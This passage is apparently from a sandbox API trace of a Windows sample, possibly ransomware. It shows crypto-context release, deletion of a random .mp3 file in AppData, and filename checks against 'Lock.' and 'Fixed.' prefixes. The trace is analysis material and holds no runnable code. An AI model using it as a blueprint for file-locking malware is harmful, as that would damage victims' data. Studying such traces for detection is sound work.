lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0220.798] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0220.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0220.799] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.799] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0220.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0220.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0220.799] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0220.799] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0220.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0220.799] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0220.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0220.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0220.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0220.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0220.799] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0220.799] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0220.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0220.800] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0220.800] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0220.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0220.800] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0220.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0220.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0220.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0220.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0220.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ba8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0220.800] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0220.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0220.801] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0220.801] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0220.801] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0220.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.801] FreeLibrary (hLibModule=0x756e0000) returned 1 [0220.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0220.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0220.802] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0220.802] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0220.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0220.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0220.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0220.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0220.802] CloseHandle (hObject=0x2a0) returned 1 [0220.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0220.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0220.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0220.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0220.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0220.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0220.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0220.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0220.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0220.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0220.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0220.806] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.806] CloseHandle (hObject=0x2d0) returned 1 [0220.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0220.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0220.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0220.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0220.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0220.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0220.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0220.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0220.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0220.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0220.813] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.816] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.816] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.816] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/0lKdr4kmMec0.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\0lKdr4kmMec0.mp3", lpFilePart=0x8cedf4*="0lKdr4kmMec0.mp3") returned 0x30 [0220.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0220.817] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\0lKdr4kmMec0.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\0lkdr4kmmec0.mp3")) returned 0x20 [0220.817] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\0lKdr4kmMec0.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x860832e0, ftCreationTime.dwHighDateTime=0x1d5e182, ftLastAccessTime.dwLowDateTime=0x6d365f20, ftLastAccessTime.dwHighDateTime=0x1d5e2dc, ftLastWriteTime.dwLowDateTime=0x6d365f20, ftLastWriteTime.dwHighDateTime=0x1d5e2dc, nFileSizeHigh=0x0, nFileSizeLow=0x119e6, dwReserved0=0x1, dwReserved1=0x1c, cFileName="0lKdr4kmMec0.mp3", cAlternateFileName="0LKDR4~1.MP3")) returned 0xa87490 [0220.817] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\0lKdr4kmMec0.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\0lkdr4kmmec0.mp3")) returned 1 [0220.904] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x860832e0, ftCreationTime.dwHighDateTime=0x1d5e182, ftLastAccessTime.dwLowDateTime=0x6d365f20, ftLastAccessTime.dwHighDateTime=0x1d5e2dc, ftLastWriteTime.dwLowDateTime=0x6d365f20, ftLastWriteTime.dwHighDateTime=0x1d5e2dc, nFileSizeHigh=0x0, nFileSizeLow=0x119e6, dwReserved0=0x1, dwReserved1=0x1c, cFileName="0lKdr4kmMec0.mp3", cAlternateFileName="0LKDR4~1.MP3")) returned 0 [0220.905] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0220.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0220.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0220.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0220.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0220.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0220.905] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0221.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0221.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0221.025] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0221.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0221.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0221.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0221.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0221.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0221.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0221.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0221.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0221.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0221.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0221.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0221.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0221.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0221.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0221.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0221.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0221.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0221.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0221.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x62) returned 0x3be0dd0 [0221.026] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/0lKdr4kmMec0.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\0lKdr4kmMec0.mp3", lpFilePart=0x8cf650*="0lKdr4kmMec0.mp3") returned 0x30 [0221.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0221.026] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\0lKdr4kmMec0.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\0lkdr4kmmec0.mp3")) returned 0xffffffff [0221.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0221.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0221.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0221.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0221.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0221.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0221.026] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0221.027] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.027] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0221.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0221.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0221.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0221.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0221.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0221.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0221.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0221.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0221.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0221.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0221.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0221.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0221.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3P0loyjD.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P0loyjD.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0loyjD.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="loyjD.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oyjD.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yjD.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jD.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0221.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0221.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0221.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0221.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0221.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0221.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0221.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0221.028] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0221.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0221.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0221.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0221.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0221.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0221.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0221.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0221.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0221.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0221.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0221.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0221.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0221.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0221.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0221.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0221.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0221.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e79310 [0221.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0221.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3P0loyjD.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P0loyjD.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0loyjD.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="loyjD.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oyjD.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yjD.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jD.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0221.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0221.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0221.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0221.030] HeapFree (in: 